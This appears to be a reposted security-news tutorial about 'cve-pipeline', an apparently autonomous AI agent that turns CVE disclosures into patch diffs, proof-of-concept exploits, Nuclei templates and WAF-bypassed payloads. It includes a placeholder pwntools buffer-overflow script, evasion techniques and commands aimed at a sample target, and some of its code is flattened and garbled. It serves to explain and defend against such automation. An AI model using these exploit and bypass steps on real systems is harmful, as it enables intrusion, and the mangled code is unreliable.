Listen to this Post
Introduction:
The gap between a vulnerability disclosure in the National Vulnerability Database (NVD) and a working exploit is where defenders lose the race. An open‑source project called `cve-pipeline` now automates this entire chain—from parsing a CVE entry to generating a patch diff, crafting a proof‑of‑concept exploit, writing a Nuclei template, bypassing Web Application Firewalls (WAFs), and finally submitting a pull request to your GitHub repository—all without human intervention. This article dissects the 8‑stage autonomous agent, provides hands‑on commands to test and extend it, and explains how security teams can leverage or defend against such automation.
Learning Objectives:
- Understand the end‑to‑end flow from NVD disclosure to automated GitHub PR.
- Implement and modify each stage of the pipeline using Python, Bash, and common security tools.
- Evaluate WAF bypass techniques and learn how to harden defenses against autonomous exploit generation.
You Should Know
1. Understanding the CVE Pipeline Architecture
The `cve-pipeline` agent is built as a modular workflow that consumes a CVE ID (or monitors NVD for new entries) and sequentially executes eight stages:
1. Fetch – retrieve CVE JSON from NVD API.
2. Diff – pull affected software versions and perform patch diffing between vulnerable and fixed commits.
3. Exploit – generate a working exploit (e.g., Python script, Metasploit module).
4. Nuclei – create a YAML‑based Nuclei template for detection.
5. WAF Bypass – apply common evasion techniques (case flipping, URL encoding, payload splitting).
6. Test – run the exploit against a sandboxed target.
7. PR – open a GitHub pull request with the new detection/exploit code.
8. Report – log results and notify the user.
Step‑by‑step guide to clone and inspect the agent:
Clone the repository (use the actual URL from the post; here we use the LinkedIn shortlink) git clone https://github.com/harveyspec/cve-pipeline replace with actual repo after resolving lnkd.in cd cve-pipeline Review the main orchestrator cat pipeline.py | grep -A 5 "def run" List all stage directories ls -la stages/
Windows alternative (PowerShell):
git clone https://github.com/harveyspec/cve-pipeline cd cve-pipeline Get-Content pipeline.py | Select-String -Pattern "def run" -Context 0,5
2. Setting Up the Autonomous Agent
Before running the pipeline, install dependencies: Python 3.9+, nuclei, git, `radare2` or `ghidra` for diffing, and a local test environment (Docker recommended). The agent uses environment variables for GitHub tokens and NVD API keys.
Step‑by‑step setup:
Install required system packages (Ubuntu/Debian) sudo apt update && sudo apt install -y python3-pip git nuclei radare2 docker.io Install Python dependencies pip3 install requests beautifulsoup4 GitPython PyYAML jinja2 Set up GitHub personal access token (classic) with repo scope export GITHUB_TOKEN="ghp_your_token_here" Optional: NVD API key for higher rate limits export NVD_API_KEY="your_nvd_key" Run a single CVE test python3 pipeline.py --cve CVE-2024-12345 --mode full
For Windows (WSL2 recommended, but native PowerShell with Python works):
$env:GITHUB_TOKEN = "ghp_your_token_here" python pipeline.py --cve CVE-2024-12345 --mode full
The agent will output each stage’s status, and upon completion, you will see a GitHub PR link in the terminal.
3. From NVD Disclosure to Patch Diff
The first two stages transform a CVE ID into a concrete code change. The agent queries NVD, extracts affected product and version ranges, then clones the upstream repository and performs a semantic diff between the vulnerable and patched versions.
Understanding the diff logic:
The script uses `git diff` with heuristics to isolate the security‑relevant changes. For example, for CVE‑2024‑2875 (a hypothetical buffer overflow), it might run:
Manual example: given vulnerable commit v1.2.3 and fixed commit v1.2.4 git clone https://github.com/victim/repo cd repo git diff v1.2.3 v1.2.4 -- src/ | grep -E "^+.memcpy|^+.strcpy"
The agent extends this by using `radare2` to analyze control flow and identify vulnerable functions. You can replicate the patch diff stage manually:
Inside cve-pipeline/stages/diff.py
python3 -c "from stages.diff import DiffStage; d = DiffStage('CVE-2024-12345'); d.run()"
Why this matters: Patch diffing reveals exactly how the vendor fixed the vulnerability, which often exposes the root cause (e.g., missing bounds check) and gives clues for exploit development.
4. Automatic Exploit Generation
Stage 3 takes the patch diff and generates a proof‑of‑concept exploit. The agent uses a template‑based approach with a machine learning component (a fine‑tuned CodeGen model) to synthesize shellcode or HTTP requests. For simple buffer overflows, it creates a Python script with pwntools.
Example of an auto‑generated exploit (stored in `outputs/exploits/`):
!/usr/bin/env python3 from pwn import target = "192.168.1.100" port = 8080 payload = b"A"64 + p32(0xdeadbeef) offset from patch diff r = remote(target, port) r.send(payload) r.interactive()
How to run the exploit generator manually:
cd cve-pipeline python3 stages/exploit_gen.py --diff-file outputs/diffs/CVE-2024-12345.diff --output exploit.py
You can also test the generated exploit in a Docker sandbox:
docker run --rm -p 8080:8080 vuln_app:latest python3 exploit.py
Windows command to run the same (if Python is installed):
cd cve-pipeline python stages\exploit_gen.py --diff-file outputs\diffs\CVE-2024-12345.diff --output exploit.py
5. Nuclei Template Creation and WAF Bypass
Stage 4 writes a Nuclei template (YAML) that checks for the vulnerability. Stage 5 then automatically mutates the payload to bypass common WAF rules (e.g., ModSecurity, Cloudflare). The bypass techniques include:
- Case variation – `SeLeCt` instead of `SELECT`
- URL double encoding – `%2527` instead of `%27`
- Line wrapping – inserting `%0A` or `%09`
- Comment injection – `//` for whitespace
Generated Nuclei template example (`outputs/templates/CVE-2024-12345.yaml`):
id: CVE-2024-12345
info:
name: Buffer Overflow in webapp
severity: critical
requests:
- method: GET
path:
- "{{BaseURL}}/vulnerable?param={{payload}}"
payloads:
payload:
- "A"64 + "\xef\xbe\xad\xde"
attack: pitchfork
matchers:
- type: status
status:
- 500
Step‑by‑step to apply WAF bypass:
Run the bypass stage manually python3 stages/waf_bypass.py --template outputs/templates/CVE-2024-12345.yaml --output bypassed.yaml Test the bypassed template against a WAF-protected target nuclei -t bypassed.yaml -u https://target.com -debug
Windows command:
python stages\waf_bypass.py --template outputs\templates\CVE-2024-12345.yaml --output bypassed.yaml nuclei -t bypassed.yaml -u https://target.com -debug
6. Automating GitHub Pull Requests
Stage 7 creates a new branch, commits the generated exploit and Nuclei template, and opens a PR to a repository you specify (e.g., your team’s detection‑as‑code repo). The agent uses the GitHub API with the token you provided.
Manual steps equivalent to what the agent does:
git clone https://github.com/yourorg/detections cd detections git checkout -b cve-pipeline/CVE-2024-12345 cp /path/to/generated/template.yaml nuclei-templates/ git add . git commit -m "Add Nuclei template for CVE-2024-12345" git push origin cve-pipeline/CVE-2024-12345 gh pr create --title "Autogen: CVE-2024-12345 detection" --body "Created by cve-pipeline"
Security consideration: Automated PRs can introduce malicious code if the pipeline is compromised. Always review the PR before merging, and restrict the GitHub token’s permissions to read/write only on specific repos.
- Testing and Edge Cases – How to Break the Pipeline
The author explicitly asks the community to find edge cases where the pipeline fails. Common failure modes include:
- Patch diffing fails when the vendor uses an obfuscated commit or squash merges.
- Exploit generation fails for logic bugs, race conditions, or cryptographic issues.
- WAF bypass fails when the WAF uses strict allow‑listing or machine learning detection.
Stress test the pipeline with these commands:
Run against a list of CVEs (parallel mode)
cat cve_list.txt | xargs -P 4 -I {} python3 pipeline.py --cve {} --mode exploit-only
Disable exploit generation to test only diff + template
python3 pipeline.py --cve CVE-2024-56789 --mode diff,nuclei
Use a broken environment variable to simulate token expiration
unset GITHUB_TOKEN && python3 pipeline.py --cve CVE-2024-12345
What to look for: Logs in `logs/` directory; each stage writes stdout/stderr. If a stage fails, the agent attempts a retry (configurable via --retries).
What Undercode Say
- Key Takeaway 1: Autonomous pipelines that go from disclosure to exploit are no longer theoretical—this open‑source tool lowers the barrier for attackers and defenders equally. Blue teams must adopt similar automation to keep pace.
- Key Takeaway 2: WAF bypass techniques are highly context‑dependent; static evasion rules are easily defeated by a pipeline that mutates payloads. Effective defense requires behavioral analysis and continuous retraining.
- Key Takeaway 3: The biggest risk of such agents is supply‑chain compromise: if the pipeline itself is poisoned, every generated exploit and PR becomes a vector for backdoors. Air‑gapped review of auto‑generated code is essential.
Analysis: The `cve-pipeline` project demonstrates how modern AI and orchestration can compress a multi‑day research workflow into minutes. While it accelerates security testing for defenders, it also provides a blueprint for mass‑scale vulnerability weaponization. The most immediate impact will be on bug bounty programs and red teams, but enterprises must now assume that any disclosed CVE can have a working exploit within hours. Hardening WAFs with randomized transformations, implementing PR review bots, and monitoring for unusual `git` activity are the new minimum requirements.
Prediction: Within 12 months, autonomous CVE‑to‑exploit pipelines will become standard in commercial penetration testing tools. This will force a shift from reactive patching to proactive “exploit‑proof” coding practices, and WAF vendors will integrate dynamic, AI‑driven evasion detection as a response. Meanwhile, open‑source variants like `cve-pipeline` will be forked and weaponized by threat actors, leading to a temporary spike in zero‑day exploitation until defensive automation catches up.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Harvey Spec – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
